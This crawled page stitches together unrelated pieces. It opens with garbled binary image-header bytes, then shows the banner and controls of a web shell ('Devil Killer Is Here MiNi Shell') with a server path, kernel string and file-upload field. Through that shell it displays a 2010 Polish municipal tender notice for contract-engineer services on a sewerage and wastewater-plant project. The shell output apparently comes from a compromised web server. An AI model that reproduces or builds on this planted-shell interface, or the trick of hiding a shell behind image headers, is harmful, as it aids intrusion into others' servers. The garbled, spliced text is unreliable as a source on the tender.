JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100629/169255-N-2010.html

<p class="kh_header"><b>Miasteczko Krajeńskie: PEŁNIENIE FUNKCJI INŻYNIERA KONTRAKTU PRZY REALIZACJI PROJEKTU:
OCHRONA WÓD ZLEWNI RZEKI NOTEĆ -  AGLOMERACJA MIASTECZKO KRAJEŃSKIE 

obejmującego budowę kanalizacji sanitarnej i oczyszczalni ścieków w Gminie Miasteczko Krajeńskie</b><br>
<b>Numer ogłoszenia: 169255 - 2010; data zamieszczenia: 29.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasteczko Krajeńskie , ul. Dąbrowskiego 16, 89-350 Miasteczko Krajeńskie, woj. wielkopolskie, tel. 067 2873196, faks 067 2873197.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://miasteczko.kraj.nowoczesnagmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE FUNKCJI INŻYNIERA KONTRAKTU PRZY REALIZACJI PROJEKTU:
OCHRONA WÓD ZLEWNI RZEKI NOTEĆ -  AGLOMERACJA MIASTECZKO KRAJEŃSKIE 

obejmującego budowę kanalizacji sanitarnej i oczyszczalni ścieków w Gminie Miasteczko Krajeńskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi pełnienia funkcji Inżyniera Kontraktu przy realizacji projektu: OCHRONA WÓD ZLEWNI RZEKI NOTEĆ -  AGLOMERACJA MIASTECZKO KRAJEŃSKIE
3.1.	Budowa kanalizacji sanitarnej i  oczyszczalni ścieków w Gminie Miasteczko Krajeńskie. 
3.2.	Zamówienie jest współfinansowane ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013.
3.3.	Zakres robót budowlanych objętych nadzorem przewiduje: 
a)	wykonanie kanalizacji sanitarnej na terenie Gminy Miasteczko Krajeńskie, w skład 
      której wchodzą:
         1)   16342 mb kanalizacji grawitacyjnej, w tym 13490 mb średnicy 250 mm i 2852   
                mb średnicy 160 mm,
        2)   16880 mb kanalizacji tłocznej, w skład której wchodzą przewody o średnicach 
              110 mm - 9696 mb, 75 mm - 3562 mb, 63 mm - 152 mb, 50 mm - 1219 mb,  
               40  mm - 2251 mb,
        3)    Pompownie przydomowe - 81 szt,
        4)    Pompownie sieciowe (tłocznie) - 8 szt,
        5)    Wytyki korki - 390 szt,
        6)    Studnie rewizyjne, odpowietrzające, czyszczakowe razem 395 szt,
   b)  rozbudowa gminnej oczyszczalni ścieków w miejscowości Brzostowo z 
        następującym zakresem robot:
      1)   Roboty rozbiórkowe,
      2)   Budowa obiektów:
            - reaktor biologiczny - 304,45m2 
            - budynek techniczny - 98,61m2
            - wiata technologiczna - 25,21m2
            - plac składowania osadu odwodnionego - 96,00m2
            - stacja zlewcza ścieków dowożonych - 9,99m2
                     - zbiornik wody technologicznej -  4,15m2
                     - komora pomiarowa ścieków oczyszczonych - 1,21m2
                     - wylot do odbiornika (poza terenem oczyszczalni) - 1m2
               3)   Adaptacja obiektów:
                      - budynek socjalny - 158,68m2
                      - komora stabiliz. osadu z zagęszcz.- 83,78m2
                      - przepompownia ścieków - 28,27m2
               4)   Wykonanie drogi dojazdowej oraz dróg i chodników na obiekcie
               5)   Wykonanie instalacji:
                       - gazu i instalacji grzewczej gazowej
                       - sanitarnej
                       - wentylacji
                       - elektrycznej
                       - AKPiA
                       - oświetlenia zewnętrznego
                6)   Wykonanie opłotowania terenu oczyszczalni.
               

3.4.	Zamawiający zawarł umowę z Wykonawcą na budowę kanalizacji sanitarnej w
          miejscowościach Brzostowo, Miasteczko Krajeńskie, Grabówno, Miasteczko Huby 
          oraz Wolsko. Aktualnie jest prowadzony przetarg na wyłonienie Wykonawcy budowy 
          gminnej oczyszczalni ścieków.

3.5.	Obowiązki Inżyniera Kontraktu:

W zakresie nadzoru Inwestorskiego:
1)	pełnienie nadzoru inwestorskiego zgodnie z ustawą z dnia 7 lipca 1994 r. prawo budowlane (dz. u. nr 89 poz. 414 - z późn. zm.),
2)	nadzór i kontrola nad właściwym i terminowym wdrażaniem inwestycji,
3)	zapewnienie zgodności wykonywanych robót z technicznymi i umownymi wymaganiami wykonania robót,
4)	kontrola i nadzór nad zgodnością realizacji robót z odpowiednimi wymaganiami bezpieczeństwa i ochrony zdrowia, bezpieczeństwa przeciwpożarowego, przepisów związanych z ochroną środowiska,
5)	zatwierdzenie proponowanych metod i technologii wykonywania robót budowlanych, włączając w to roboty tymczasowe, zaproponowane przez Wykonawcę,
6)	współpraca z archeologiem obsługującym roboty budowlane.

W zakresie odbiorów robót:
7)	nadzór rzeczowo - terminowy w zakresie przygotowania dokumentów niezbędnych do uzyskania decyzji pozwolenia na użytkowanie,
8)	sprawdzanie ilości i jakości wykonywanych robót, dokonywanie odbiorów częściowych, dokonywanie odbioru robót zanikających i ulegających zakryciu,
9)	przygotowanie dokumentów wymaganych do zgłoszenia zakończenia budowy do organu nadzoru budowlanego, 
10)	organizacja oraz przeprowadzanie odbiorów częściowych, końcowych i ostatecznego, tj. podjęcie wszelkich niezbędnych czynności dla prawidłowego przeprowadzania odbiorów, łącznie z powołaniem komisji odbiorowych oraz przygotowaniem protokołów odbioru z porozumieniu z Zamawiającym,

W zakresie jakości robót:
11)	akceptowanie Programów Zapewnienia Jakości,
12)	zatwierdzanie i kontrolowanie jakości wykonywanych robót, wbudowanych materiałów i ich zgodności z obowiązującymi normami, przepisami i specyfikacją techniczną wykonania i odbioru robót budowlanych,
13)	kontrolowanie zgodności wykonanych robót z dokumentacją projektowa, umową i obowiązującym w trakcie realizacji harmonogramem robót,
14)	sprawdzanie materiałów przed ich wbudowaniem w zakresie dopuszczenia do stosowania zgodnie z wymogami określonymi w art. 10 ustawy - Prawo budowlane,
W zakresie robót nieprzewidzianych (dodatkowych) i zamiennych:
15)	zatwierdzanie rysunków zamiennych i uzupełniających wykonanych w ramach nadzoru autorskiego,
16)	zatwierdzanie rysunków roboczych wykonawcy robót i niezbędnych korekt tych rysunków,
17)	rekomendowanie wszystkich zmian w planach i specyfikacjach, które mogą okazać się niezbędne lub pożądane podczas lub w następstwie wykonywania robót,
18)	szacowanie i weryfikowanie robót dodatkowych i zamiennych zaproponowanych przez Wykonawcę, w zakresie wartości fizycznych i finansowych,
19)	uzgadnianie z Zamawiającym wszelkich zmian dotyczących wartości robót,
20)	sporządzanie protokołów konieczności w przypadku potrzeby wykonania robót dodatkowych lub zamiennych, uzasadnienie konieczności wykonywania tych prac oraz wnioskowanie do Zamawiającego o ich wykonanie,
W zakresie współpracy z Zamawiającym:
21)	Uczestnictwo w radach budowy dotyczących postępu robót z udziałem przedstawicieli Zamawiającego, wykonawcy robót - organizowanych przez Zamawiającego, 
22)	uzyskanie we współpracy z Zamawiającym zmiany decyzji pozwolenia na budowę, jeśli taka konieczność zaistnieje,
23)	wykonywanie dokumentacji fotograficznej podczas prowadzenia inwestycji.
24)	informowanie Zamawiającego na bieżąco o postępach w realizacji robót, stwierdzonych nieprawidłowościach lub zagrożeniach w realizacji robót wynikających z zatwierdzonego przez Zamawiającego harmonogramu robót oraz informowanie o sposobach ich rozwiązania i/lub działaniami korygującymi, mającymi na celu usuwanie tych problemów,
25)	sporządzanie dla Zamawiającego okresowych (miesięcznych, kwartalnych, półrocznych, rocznych, końcowych) raportów, harmonogramów, planów, prognoz wydatków,
26)	współpraca z Zamawiającym w egzekwowaniu postanowień umowy na roboty budowlane,
27)	ocenianie i pomoc w rozstrzyganiu wszelkich roszczeń, związanych z realizacją umowy na roboty budowlane oraz problemów powstałych podczas robót, zapobieganie sporom i opóźnieniom, gdy jest to wykonalne,
28)	reprezentowanie interesów Zamawiającego na budowie w zakresie spraw technicznych i ekonomicznych w ramach dokumentacji projektowej, Prawa budowlanego oraz umowy na realizację inwestycji,
29)	zachowanie poufności informacji,
30)	dokonanie pełnych rozliczeń końcowych budowy oraz poszczególnych odcinków, zgodnie z wymogami dla nadzorowania inwestycji współfinansowanych ze środków Unii Europejskiej,
31)	uczestniczenie w kontrolach instytucji dotującej, wyjaśnianie wątpliwości, przygotowanie wspólnie z Zamawiającym pisemnych wyjaśnień - jeśli taka konieczność zaistnieje,
32)	przygotowanie dokumentów OT dla całości przedsięwzięcia,
33)	zapewnienie wykonywania przedmiotu zamówienia oraz inwestycji w zakresie robót budowlanych zgodnie z wytycznymi Wielkopolskiego Regionalnego Programu Operacyjnego 2007-2013,
34)	opracowywanie i przygotowywanie dokumentacji rzeczowo - rozliczeniowej (w tym wniosków o płatność) do instytucji dotującej, po zawarciu z nią umowy o dofinansowanie przedsięwzięcia,

związane z okresem gwarancji:
35)	organizowanie i uczestnictwo w przeglądach gwarancyjnych z wykonawcą robót (minimum raz w roku),
36)	każdorazowe uczestnictwo w przeglądach w przypadku pojawienia się wad, zgłaszanych Wykonawcy robót,
37)	okresowa inspekcja wad usuwanych przez Wykonawcę,
38)	zarekomendowanie zwrotu zobowiązań wynikających z umowy z Wykonawcą robót,
W zakresie kontroli:
39)	zapewnienie pełnej obsługi sprawdzającej (geodezyjnej, laboratoryjnej, rozliczeniowej),
40)	weryfikacja rysunków powykonawczych, robót zinwentaryzowanych na geodezyjnych mapach powykonawczych dostarczonych przez Wykonawcę robót,
3.6.	Szczegółowo roboty budowlane są opisane w projektach budowlanych, 
            specyfikacjach technicznych wykonania i odbioru robót, wzorach umów z    
            Wykonawcami robót. Dokumentacja projektowa jest dostępna u Zamawiającego w 
            formie elektronicznej. 

3.7.	Wykonawca robót budowlanych zapewni zespołowi Inżyniera Kontraktu pomieszczenia na biura. Wykonawca pełniący funkcję Inżyniera Kontraktu wyposaży na własny koszt przekazane pomieszczenia w sprzęt biurowy (np. faks, komputery, drukarki) oraz ponosić będzie koszty zakupu i dostawy materiałów biurowych i eksploatacyjnych do sprzętu biurowego, a także koszty przeprowadzonych rozmów telefonicznych, przesyłania faksów, wysyłki listów. Do czasu przekazania pomieszczeń biurowych przez wykonawcę robót budowlanych Wykonawca zabezpieczy na potrzeby zespołu biuro tymczasowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w 
         wysokości 12 000 złotych (słownie: dwanaście tysięcy złotych).

25.2. Wadium winno być wniesione przed upływem terminu składania ofert w następujących 
         formach, w zależności od wyboru Wykonawcy:
a)	pieniądzu, wpłaconym przelewem na rachunek bankowy Zamawiającego: 
Bank Spółdzielczy Białośliwie nr konta: 62 8937 0007 0000 0404 2000 0005,
         b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
             kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym.
         c) gwarancjach bankowych,
         d) gwarancjach ubezpieczeniowych,
         e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 
             ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju 
             Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
         Dowód wniesienia wadium powinien być dołączony do oferty.
         Uwaga:  W przypadku wnoszenia wadium w formie gwarancji lub poręczeń 
         oryginału dokumentu wadialnego nie należy trwale łączyć z dokumentami oferty. 
         W dokumenty oferty należy wpiąć kopię, a oryginał złożyć wraz z ofertą np. w 
         kopercie.
         Wadium, o którym mowa w ppkt a) zostanie uznane za wpłacone w terminie, jedynie 
         pod warunkiem, że pieniądze znajdą się na koncie Zamawiającego przed upływem  
         terminu składania ofert. 
         W przypadku Wykonawców składających wspólną ofertę, wadium winno być wniesione 
         przez jednego z Wykonawców w imieniu wszystkich Wykonawców składających 
         wspólną ofertę.
25.3. Wadium musi obejmować cały okres związania ofertą. Gwarancje bankowe, 
         ubezpieczeniowe, lub poręczenia winny posiadać ważność od dnia składania i otwarcia 
         ofert.
25.4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
25.5. Wykonawca, który nie wniesie wadium w formie lub formach, o których mowa 
         w pkt. 25.2. zostanie wykluczony z postępowania.
25.5. Zamawiający dokona niezwłocznie zwrotu wadium:
         a)  wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub 
              unieważnieniu zamówienia, z wyjątkiem Wykonawcy, którego oferta została 
              wybrana jako najkorzystniejsza,
         b)  Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający 
              zwróci wadium niezwłocznie po zawarciu umowy.
25.6. Zamawiający dokona niezwłocznie zwrotu wadium na pisemny wniosek Wykonawcy 
         który wycofał ofertę przed upływem terminu do składania ofert.
25.7. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu 
         zwrócono wadium po jego wykluczeniu z postępowania,  jeżeli w wyniku ostatecznego 
         rozstrzygnięcia protestu jego oferta została wybrana jako najkorzystniejsza.
         W takim przypadku wykonawca ponownie wnosi wadium w terminie określonym przez 
         Zamawiającego.
25.8. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami 
         wynikającymi z umowy rachunku bankowego, na którym jest ono przechowywane, 
         pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew 
         pieniędzy na rachunek wskazany przez Wykonawcę.
25.9. Wykonawca, którego oferta została wybrana, utraci wadium wraz z odsetkami na rzecz 
         Zamawiającego w przypadku, gdy:
a)	Wykonawca odmówi podpisania umowy w sprawie niniejszego zamówienia 
publicznego na warunkach określonych w ofercie;
b)	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
c)	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26, ust.3 upzp nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 upzp lub pełnomocnictw, chyba że udowodni, ze wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1)	posiadania uprawnień do wykonawstwa określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)	posiadania wiedzy i doświadczenia;
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4)	sytuacji ekonomicznej i finansowej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować, że posiada niezbędną wiedzę i doświadczenie. W tym względzie udokumentuje, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie wykonał co najmniej jedną usługę polegającą na pełnieniu funkcji Inżyniera Kontraktu na budowie instalacji sanitarnych, współfinansowanej ze środków Unii Europejskiej o wartości nadzorowanych robót minimum 15 000 000 złotych (słownie: piętnaście  milionów złotych) oraz udokumentuje, że wykonał tę usługę należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować, że dysponuje osobami zdolnymi do zrealizowania zamówienia. 
Zamawiający wymaga, aby kadra zatrudniona przy wykonywaniu usługi spełniała następujące wymagania:
a) Inżynier Rezydent:
- uprawnienia budowlane bez ograniczeń do kierowania robotami w branży sanitarnej,  
- aktualny wpis do Izby Inżynierów Budownictwa,
- minimum 5 lat doświadczenia zawodowego na stanowiskach kierowniczych w 
   bezpośrednim zarządzaniu lub nadzorowaniu robót,
b)	Inspektor robót ogólnobudowlanych:
          - uprawnienia konstrukcyjne
          - aktualny wpis do Izby Inżynierów Budownictwa,
          - minimum 3 letnie doświadczenie w kierowaniu lub nadzorowaniu robót ogólno-
            budowlanych,
c)Inspektor robót sanitarnych (instalacyjnych):
uprawnienia budowlane bez ograniczeń w specjalności sanitarnej
aktualny wpis do Izby Inżynierów Budownictwa
minimum 5 lat doświadczenia w kierowaniu lub nadzorowaniu robót sanitarnych,
d) Inspektor nadzoru robót elektrycznych
-  uprawnienia budowlane z zakresu branży elektrycznej,
-  aktualny wpis do Izby Inżynierów Budownictwa,
-  minimum 3-letnie doświadczenie w kierowaniu lub nadzorowaniu robót 
   elektrycznych,
e) Inspektor nadzoru robót drogowych:
- uprawnienia budowlane  w specjalności drogowej,
- aktualny wpis do Izby Inżynierów Budownictwa,
- minimum 3 lata doświadczenia w kierowaniu lub nadzorowaniu robotami drogowymi,
g) Geodeta:
- osoba wyznaczona do kierowania obsługą geodezyjną robót musi posiadać    
   uprawnienia geodezyjne do wykonywania funkcji w dziedzinie geodezji i kartografii 
   w zakresie geodezyjnej obsługi inwestycyjnej oraz geodezyjnych pomiarów 
   sytuacyjno-wysokościowych, realizacyjnych i inwentaryzacyjnych,
- minimum 5 lat doświadczenia zawodowego,
h) Technolog:
- wykształcenie wyższe techniczne,
- co najmniej 3 lata doświadczenia zawodowego w pracy na stanowisku technologa,
- doświadczenie w badaniu materiałów budowlanych,
i) Specjalista ds. rozliczeń:
- wykształcenie wyższe,
- co najmniej 3-letnie doświadczenie w kosztorysowaniu robót budowlanych,
- doświadczenie w rozliczaniu i sprawozdawczości na co najmniej jednym 
   przedsięwzięciu, dotyczącym robót budowlanych, współfinansowanym ze środków 
   Unii Europejskiej o wartości nie mniejszej niż 15 000 000 złotych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany udokumentować, że znajduje się w sytuacji ekonomicznej i finansowej gwarantującej wykonanie zamówienia i w tym względzie udokumentuje, że: 
1)	dysponuje środkami finansowymi lub zdolnością kredytową  w wysokości nie mniejszej niż 500 000 złotych (słownie: pięćset tysięcy złotych).
2)	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 3 000 000 złotych,
Jeżeli Wykonawca będzie polegał na zdolności finansowej innego podmiotu, wówczas do oferty należy załączyć pisemne zobowiązanie tego podmiotu o udostępnieniu środków finansowych Wykonawcy wraz z informacją banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym ten podmiot posiada rachunek potwierdzającą spełnienie warunku określonego w pkt. 6.3. ppkt. 1).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

